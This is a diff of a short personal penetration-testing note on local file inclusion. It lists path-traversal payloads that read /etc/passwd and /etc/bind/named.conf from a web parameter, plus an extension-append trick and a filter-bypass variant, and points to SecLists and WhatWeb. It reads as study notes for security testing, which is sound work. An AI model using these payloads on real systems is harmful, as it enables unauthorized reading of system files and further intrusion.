kolbyn24/Notes/03 - Content/LFI.md

 `http://192.168.1.70/index.php?system=../../../../../../../../../../../../../../../../../etc/passwd

-if that doesn't work try
+if that doesn't work try adding an allowed extension:
 `http://192.168.1.70/index.php?system=../../../../../../../../../../../../../../../../../etc/passwd.html
+Or try different syntax like:
+`GET /download?file=....//....//...//....//....//etc/bind/named.conf`

+seclist has lists of lfi's that can be used.

 ### whatweb can identify web severs and get common directories
 https://github.com/urbanadventurer/WhatWeb